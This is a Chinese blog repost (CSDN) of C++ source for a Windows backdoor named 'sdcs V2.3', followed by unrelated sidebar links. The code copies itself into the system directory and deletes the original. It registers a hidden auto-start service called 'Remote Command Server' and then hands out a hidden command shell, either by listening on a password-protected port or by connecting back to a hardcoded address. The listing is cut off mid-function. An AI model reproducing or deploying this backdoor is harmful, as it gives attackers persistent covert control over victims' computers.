sdcs V2.3 exe/dll 正+反弹后门

最新推荐文章于 2024-04-19 11:55:38 发布
最新推荐文章于 2024-04-19 11:55:38 发布
阅读量1.2k 收藏
点赞数
分类专栏: vcbcbdelphi的window编程 文章标签: service socket winapi null path attributes
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2310979
版权
// SmartDoor.cpp : 定义 DLL 应用程序的入口点。
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
#include "stdafx.h"
#include "SDdllw.h"

#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#include <string>
using namespace::std;

#include <Shellapi.h>
#include <winsock2.h>
#include <urlmon.h>

#pragma comment (lib,"ws2_32")
#pragma comment (lib, "urlmon.lib")

void     LogToFile(const char * , int nErrNo = 0) ;             //日志记录

#define MAXLINK     5             //客户端连接最大数目
#define PASSWORD "dream2fly"     //连接密码
u_short g_nPort = 12345;             //定义监听端口                    

//#define _REVERSE 1


#define BUFLEN 65535    

bool Passport(SOCKET *csock);
void ConnectClient();
void ShellServer();
//命令行执行函数
DWORD WINAPI ExeCmdShell(LPVOID lp);

#define                     SERVICENAME             "Remote Command Server"
#define                     SERVICEDISPLAYNAME     SERVICENAME

SC_HANDLE                 scm,svc;
SERVICE_STATUS           ServiceStatus;
SERVICE_STATUS_HANDLE   ServiceStatusHandle;

DWORD IsService( BOOL& );
int     InitService();
void InstallService();
int DeleteSvc();
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv);
void WINAPI ServiceCtrlHandler(DWORD dwControl);

#ifdef _MYEXE
//程序入口
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
     int nArg;
     LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
     if (nArg!=1)
     {
         g_nPort=_wtoi(para[1]);    
     }

     LocalFree(para);

     InitService();
    
     return 0;
}
#else
//程序入口
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD   ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
     switch (ul_reason_for_call)
     {
     case DLL_PROCESS_ATTACH:
     case DLL_THREAD_ATTACH:
     case DLL_THREAD_DETACH:
     case DLL_PROCESS_DETACH:
         break;
     }
     return TRUE;
}

#endif

int InitService(void)
{
     //服务入口表
     SERVICE_TABLE_ENTRY     ServiceTableEntry[] = {
         { SERVICENAME,     ServiceMain },
         { NULL, NULL } };

     BOOL bService = TRUE;

     // This process should be a service :)
     IsService( bService );
     if ( bService )
     {     // Start service
         LogToFile( "This process is service" , GetLastError() );
         if (!StartServiceCtrlDispatcher(ServiceTableEntry))
         {
             LogToFile( "StartServiceCtrlDispatcher" , GetLastError() );
             InstallService();            
         }
     }
     else//如果不是服务启动,安装服务
     {
         LogToFile( "This process is not service" , GetLastError() );
         InstallService();
     }

     return 0;
}
//http://www.dream2fly.net/
//源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^
// Deletes service
int DeleteSvc()
{
   // Open service manager
   SC_HANDLE hSCM = ::OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS);

   if (hSCM == NULL)
   {
       LogToFile( "DeleteSvc->OpenSCManager" ,GetLastError() );
       return 0;
   }

   // OPen service
   SC_HANDLE hService = ::OpenService( hSCM, SERVICENAME, SERVICE_ALL_ACCESS );

   if (hService == NULL)
   {
       LogToFile( "DeleteSvc->OpenService" ,GetLastError() );
       ::CloseServiceHandle(hSCM);
       return 0;

   }

   //SERVICE_STATUS status;
   //if(!ControlService(hService, SERVICE_CONTROL_STOP, &status))
   //{
       // LogToFile( "DeleteSvc->ControlService",   GetLastError() );
   //}  

   // Deletes service from service database
   if (0 == DeleteService( hService ))
   {
       LogToFile( "DeleteSvc->DeleteService" ,GetLastError() );
       return 0;
   }
   // Stop the service
   ServiceStatus.dwCurrentState       = SERVICE_STOPPED;
   ServiceStatus.dwCheckPoint         = 0;
   ServiceStatus.dwWaitHint           = 0;
   ServiceStatus.dwWin32ExitCode       = 0;
   ServiceStatus.dwServiceSpecificExitCode = 0;
   if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
   {
       LogToFile( "DeleteSvc->SetServiceStatus",   GetLastError() );
   }
  
   ::CloseServiceHandle(hService);
   ::CloseServiceHandle(hSCM);
   return 0;
}

string WideToMutilByte(const wstring& _src)
{
     int nLen = (int)_src.length();

     char *pszTemp = new char[sizeof(wchar_t)*(nLen + 1)];

     int pos = WideCharToMultiByte(GetACP(), 0, _src.c_str(), nLen, pszTemp, sizeof(wchar_t)*(nLen + 1), 0, FALSE);

     pszTemp[pos] = '/0';

     string strRet(pszTemp);

     delete []pszTemp;

     return strRet;
}

void InstallService()
{    
     char szSysDir[MAX_PATH] = {0};
     GetSystemDirectory(szSysDir,sizeof(szSysDir));

#ifdef _MYEXE
     //获得进程的绝对路径
     char szExePath[MAX_PATH] = {0};
     //获得本程序EXE所在地的full path
     GetModuleFileName(NULL,szExePath,MAX_PATH);
     //获得执行文件名
     char *ExeName=szExePath+strlen(szExePath);
     for(;*ExeName!='//';ExeName--)
         NULL;
     ExeName++;

     char szServicPath[MAX_PATH];
     memset(szServicPath,0,sizeof(szServicPath));
     strcpy(szServicPath, szSysDir);
     strcat(szServicPath,"//");
     strcat(szServicPath,ExeName);
#else


     char szCurDir[MAX_PATH] = {0};
     GetCurrentDirectory(MAX_PATH-1,szCurDir);
     TCHAR szExeFile[MAX_PATH] = {0};
     int nArg;
     LPWSTR *para = CommandLineToArgvW(::GetCommandLineW(),&nArg);
     if (nArg!=1)
     {
         _tcscpy(szExeFile, WideToMutilByte(para[1]).c_str());    
     }

     //获得执行文件名
     char *ExeNameEnd=szExeFile;
     for(;*ExeNameEnd!=',';ExeNameEnd++)
         NULL;

     char szExePath[MAX_PATH] = {0};
     strcpy(szExePath, szCurDir);
     strcat(szExePath,"//");
     strncat(szExePath,szExeFile, ExeNameEnd - szExeFile);

     char szServicPath[MAX_PATH] = {0};
     strcpy(szServicPath, szSysDir);
     strcat(szServicPath,"//");
     strncat(szServicPath,szExeFile, ExeNameEnd - szExeFile);

#endif

#ifdef _DEBUG
     strcpy(szServicPath, szExePath);
#else
     //成功返回1,失败返回0.复制方向--->>  
     if(!CopyFile(szExePath,szServicPath,FALSE))
     {
         LogToFile( "CopyFile" , GetLastError() );
     }
#endif

     if(stricmp(szExePath, szServicPath))
     {
         DeleteFile(szExePath);
     }
     char szDllStartPath[MAX_PATH] = {0};

#ifdef _MYEXE
     strcpy(szDllStartPath, szExePath);
#else

     strcpy(szDllStartPath, szSysDir);
     strcat(szDllStartPath, "//rundll32.exe ");
     strcat(szDllStartPath, szServicPath);
     strcat(szDllStartPath, ",InitService");
#endif
     //实现服务启动
     scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
     if (scm==NULL)
     {
         LogToFile( "OpenSCManager" ,GetLastError() );
     }
     else
     {
         svc=::CreateService(scm,SERVICENAME,SERVICEDISPLAYNAME,SERVICE_ALL_ACCESS,
             SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
             SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szDllStartPath,NULL,NULL,NULL,NULL,NULL);
         if (svc != NULL || GetLastError() == ERROR_SERVICE_EXISTS)
         {
             LogToFile( "OpenService..." , GetLastError() );
             svc=::OpenService(scm,SERVICENAME,SERVICE_START);    
             if (svc == NULL)
             {
                 LogToFile( "OpenService",   GetLastError() );
             }
             else
             {
                 if (!StartService(svc,0,NULL))
                 {
                     LogToFile( "StartService",   GetLastError() );
                 }
             }    
         }
         else
         {
             LogToFile( "CreateService",   GetLastError() );
         }
         CloseServiceHandle(svc);
         CloseServiceHandle(scm);
     }
}

//服务控制器
void WINAPI ServiceCtrlHandler(DWORD dwControl)
{
     switch(dwControl)
     {
     case SERVICE_CONTROL_STOP:
         ServiceStatus.dwCurrentState   = SERVICE_STOPPED;
         ServiceStatus.dwWin32ExitCode = 0;
         ServiceStatus.dwCheckPoint     = 0;
         ServiceStatus.dwWaitHint       = 0;
         break;    
     case SERVICE_CONTROL_CONTINUE:
         ServiceStatus.dwCurrentState=SERVICE_RUNNING;
         break;
     case SERVICE_CONTROL_PAUSE:
         ServiceStatus.dwCurrentState=SERVICE_PAUSED;
         break;
     case SERVICE_CONTROL_INTERROGATE:
         break;

     }
     if (!SetServiceStatus (ServiceStatusHandle,&ServiceStatus))
     {
         LogToFile( "ServiceCtrlHandler->SetServiceStatus",   GetLastError() );
     }
     return;
}


//服务的真正入口点函数
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
     ServiceStatus.dwServiceType=SERVICE_WIN32;
     ServiceStatus.dwCurrentState=SERVICE_START_PENDING;
     ServiceStatus.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
     ServiceStatus.dwServiceSpecificExitCode=0;  
     ServiceStatus.dwWaitHint=0;
     ServiceStatus.dwCheckPoint=0;
     ServiceStatus.dwWin32ExitCode=0;

     ServiceStatusHandle=RegisterServiceCtrlHandler(SERVICENAME,ServiceCtrlHandler);
     if (ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
     {
         LogToFile( "ServiceMain->RegisterServiceCtrlHandler",   GetLastError() );
         return;
     }

     //一个服务对应一个控制处理器
     //设为运行状态
     ServiceStatus.dwCurrentState=SERVICE_RUNNING;
     ServiceStatus.dwWaitHint=0;
     ServiceStatus.dwCheckPoint=0;        
     if (!SetServiceStatus (ServiceStatusHandle, &ServiceStatus))
     {
         LogToFile( "ServiceMain->SetServiceStatus",   GetLastError() );
     }
     else
     {
#ifdef _REVERSE
         while (1)
         {
             ConnectClient();
             Sleep(100);
         }
#else
         ShellServer();
#endif
     }

     return ;
}

void ConnectClient()
{
     int ret;
     WSADATA wsa;
     ret=WSAStartup(0x0202,&wsa);
     if(ret==INVALID_SOCKET)
     {
         LogToFile( "WSAStartup " , GetLastError() );
         exit(-1);
     }

     SOCKET ssock;
     ssock=socket(AF_INET,SOCK_STREAM,0);
     if(ssock==INVALID_SOCKET){
         LogToFile( "socket " , GetLastError() );
         exit(-1);
     }

     //SO_REUSEADDR:允许重用本地地址和端口 int
     BOOL flag=TRUE;
     ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
     if(ret==SOCKET_ERROR){
         LogToFile( "setsockopt " , GetLastError() );
         exit(-1);
     }

     struct sockaddr_in sin;
     memset(&sin,0,sizeof(sin));
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=inet_addr("192.168.2.22");
     sin.sin_port=htons(666);

     //向客户端发出连接请求,Connect函数的第一个参数是发出请求的客户端的套接字,第二个参数是服务端的地址结构,第三个参数是Server地址结构的长度。
     if (connect(ssock, (struct sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
     {
         LogToFile( "connect" , GetLastError() );
     }
     else
     {
         HANDLE h=CreateThread(NULL,0,ExeCmdShell,&ssock,0,0);
         WaitForSingleObject(h,INFINITE);
     }

     closesocket(ssock);
     WSACleanup();
}

void ShellServer()
{
     int ret;
     WSADATA wsa;
     ret=WSAStartup(0x0202,&wsa);
     if(ret==INVALID_SOCKET)
     {
         LogToFile( "WSAStartup " , GetLastError() );
         exit(-1);
     }

     SOCKET ssock;
     ssock=socket(AF_INET,SOCK_STREAM,0);
     if(ssock==INVALID_SOCKET){
         LogToFile( "socket " , GetLastError() );
         exit(-1);
     }

     //SO_REUSEADDR:允许重用本地地址和端口 int
     BOOL flag=TRUE;
     ret=setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(char*)&flag,sizeof(flag));
     if(ret==SOCKET_ERROR){
         LogToFile( "setsockopt " , GetLastError() );
         exit(-1);
     }

     struct sockaddr_in sin;
     memset(&sin,0,sizeof(sin));
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=htonl(ADDR_ANY);
     sin.sin_port=htons(g_nPort);

     ret=bind(ssock,(struct sockaddr*)&sin,sizeof(sin));
     if(ret==SOCKET_ERROR){
         LogToFile( "bind " , GetLastError() );
         exit(-1);
     }

     ret=listen(ssock,MAXLINK);
     if(ret==SOCKET_ERROR)
     {
         LogToFile( "listen " , GetLastError() );
         exit(-1);
     }

     while(1)
     {
         //csock是ssock接受 accept的数据
         SOCKET csock=accept(ssock,NULL,NULL);
         if(csock==INVALID_SOCKET)
         {
             LogToFile( "accept" , GetLastError() );
         }

         HANDLE h=CreateThread(NULL,0,ExeCmdShell,&csock,0,0);
         if(h!=NULL)
         {
             WaitForSingleObject(h,INFINITE);

             closesocket(csock);
             CloseHandle(h);
         }
     }

     closesocket(ssock);
     WSACleanup();
}

//ExeCmdShell: 建立两个管道,实现交互通信 .
DWORD WINAPI ExeCmdShell(LPVOID lp)
{
     SOCKET *csock=(SOCKET*)lp;

     char *exitok = "/r/n Exit OK! Bye byte!/r/n";
     unsigned long lbyte;
     char szBuf[BUFLEN]={0};
     int ret;

     //验证
     if(Passport(csock)==false)
     {
         LogToFile( "Passport",   GetLastError() );
         closesocket(*csock);
         return -1;
     }

     SECURITY_ATTRIBUTES sa;
     sa.nLength=sizeof(SECURITY_ATTRIBUTES);
     sa.lpSecurityDescriptor=0;
     sa.bInheritHandle=TRUE;

     STARTUPINFO si;
     memset(&si,0,sizeof(si));
     si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
     si.wShowWindow=SW_HIDE;

 
iiprogram
关注
专栏目录
SDCS客户支持交付流程链接大全中国区20150228共4
11-05
很抱歉,根据您提供的信息,标题“SDCS客户支持交付流程链接大全中国区20150228共4”和描述中的“SDCS客户支持交付流程链接大全中国区20150228共4页.pdf.zip”表明,这是一个关于SDCS(可能指的是Software Defined ...
考试真题SYSU-SDCS-Final-Exams.zip
08-14
中山大学计算机学院期末考试真题整理
土司论坛nc反弹神器使用方法
weixin_30871905的博客
06-11 292
说明: PS:我本机是linux,因为没有服务器所以使用win7来演示.倘若你是windows可以在本机生成dll以后再放到服务器上面去执行dll即可反弹shell物理机ip:192.168.1.121    linux目标服务器ip:172.16.150.139  win7工具下载地址:https://www.t00ls.net/thread-46304-1-1.html ...
Reverse_tcp反向连接获得shell实验
热门推荐
把梦想放飞在蓝色的天空里...
08-08 1万+
Reverse_tcp反向连接获得shell实验 准备工作: VMWare的桥接模式: 这是一种很重要的模式,如图: 设置成桥接模式后,设置虚拟机里的ip地址时,其地址可以跟外边主机在同一个网段,同一个DNS,同样的掩码,虚拟机就相当于局域网里的另一台主机。 如果双方的防火墙都关闭了的话,主机和虚拟机是可以相互ping通的。 虚拟机还可以访问互联网,使用起来相当的方便。   简
一个简单的CMDSHELL后门
03-27 1195
一个简单的CMDSHELL后门文章作者: 小马/SmallHorse [E.S.T VIP](这个E.S.T VIP写不写是无所谓的)信息来源: 邪恶八进制 中国   最近闲着无聊,自己琢磨着写了个简单的CMDSHELL后门。同时也避免了入侵时被杀毒软件K了。参考了T-CMD源代码和以前黑防的相关文章。从中学到了很多知识。  程序很简单,运行后默认打开1983端口,也可以自己设定端口,等待客户端来
五个反弹后门的源代码[转]
02-01 1805
第一个反弹木马代码:作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(
windows shellcode 总结
weixin_34267123的博客
12-03 248
说到shellcode可能都有些迷茫,不知它是什么东西,可能觉得也很神秘,对于它的专业解释也很少有人提及,今天我们就从以下几个方面来对windows下的shellcode做一个全剖析: 1. shellcode的发展历史以及定义 2. 现今常见的windows下的shellcode种类 3. 编写shellcode流程 4. shellocode举例 5、shell...
sdcs V2.3 exe/dll +反弹后门(转)
weixin_34199335的博客
07-02 139
文章作者:dream2fly信息来源:邪恶八进制信息安全团队(www.eviloctal.com) //SmartDoor.cpp:定义DLL应用程序的入口点。//http://www.dream2fly.net///源码公布说明:从网络中来到网络中去,QQ:78623269定制^_^#include"stdafx.h"#include"SDdllw.h"#include<...
SDCS-PIN-48-SD 脉冲变压器板
Z18579229209的博客
04-19 599
SDCS-PIN-48-SD脉冲变压器板通常用于接收外部脉冲信号,例如来自编码器或其他传感器的信号,用于反馈给直流调速器,以实现精确的速度或位置控制。总的来说,SDCS-PIN-48-SD脉冲变压器板是ABB直流调速器系列中的一个重要组成部分,用于接收和处理脉冲信号,实现对电机速度或位置的精确控制。:SDCS-PIN-48-SD脉冲变压器板通常具有信号处理功能,可以对接收到的脉冲信号进行滤波、放大和处理,以确保信号的稳定性和准确性。SDCS-PIN-48-SD 脉冲变压器板。
SDCS-PIN-51 直流调速器
Z18579229209的博客
04-19 331
SDCS-PIN-51模块通常用于连接直流调速器与外部控制系统,以实现对调速器的监控和控制。总的来说,SDCS-PIN-51模块是ABB直流调速器系列中的一个重要组成部分,用于与外部控制系统进行通信和控制,以实现对电机的精确控制。:SDCS-PIN-51模块通常具有一定的控制功能,可以接收外部控制系统发送的控制命令,并根据这些命令调节直流调速器的运行状态和参数。:作为ABB产品的一部分,SDCS-PIN-51模块通常具有良好的质量和可靠性,能够在恶劣的工业环境中稳定运行。
FOXBOROI_A_SDCS系统与TRICONEXESD系统通讯浅析
03-19
介绍了关于FOXBOROI_A_SDCS系统与TRICONEXESD系统通讯浅析的详细说明,提供Triconex的技术资料的下载。
fpga锆石硬件原理图手册v2.1
10-19
根据提供的文件信息,我们可以深入探讨该文档所涉及的关键知识点,主要围绕FPGA锆石硬件原理图手册v2.1的内容进行解析。 ### FPGA锆石硬件原理图手册v2.1 #### 一、概述 本手册是关于FPGA锆石硬件原理图的设计...
一个漂亮的毕业设计模板
10-01
一个漂亮的毕业设计模板,供参考学习毕业设计写作技巧
朴素贝叶斯分类器对THUCNews数据集进行新闻分类_naive_bayes.zip
10-01
朴素贝叶斯分类器对THUCNews数据集进行新闻分类_naive_bayes
基于Java语言开发的ktapis风控系统设计源码
10-01
本项目为基于Java语言构建的ktapis风控系统设计源码,包含32个文件,涵盖18个Java源文件、6个XML配置文件、3个Markdown文件、1个Git忽略文件、1个属性文件、1个证书文件、1个JSON文件、1个密钥文件,旨在提供全面的风控解决方案。
基于ssm的旅游网站的设计与实现.zip
10-01
基于ssm的旅游网站的设计与实现
用MATLAB实现的简单基元检测处理,包括sobel算子边缘检测,SUSAN角点检测(非极大值抑制)_
10-01
用MATLAB实现的简单基元检测处理,包括sobel算子边缘检测,SUSAN角点检测(非极大值抑制)_Primitive-detection-MATLAB
基于微信小程序的奶茶点餐小程序的开题报告.docx
最新发布
10-01
基于微信小程序的奶茶点餐小程序的开题报告.docx
AT91SAM9260学习板V1.0 原理图详解
"该资源为AT91SAM9260学习板V1.0的原理图,以PDF格式提供,包含系统的整体框架和详细电路连接。" AT91SAM9260是一款基于ARM926EJ-S内核的微处理器,由Atmel公司生产,广泛应用于嵌入式系统设计。这个学习板的原理图...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值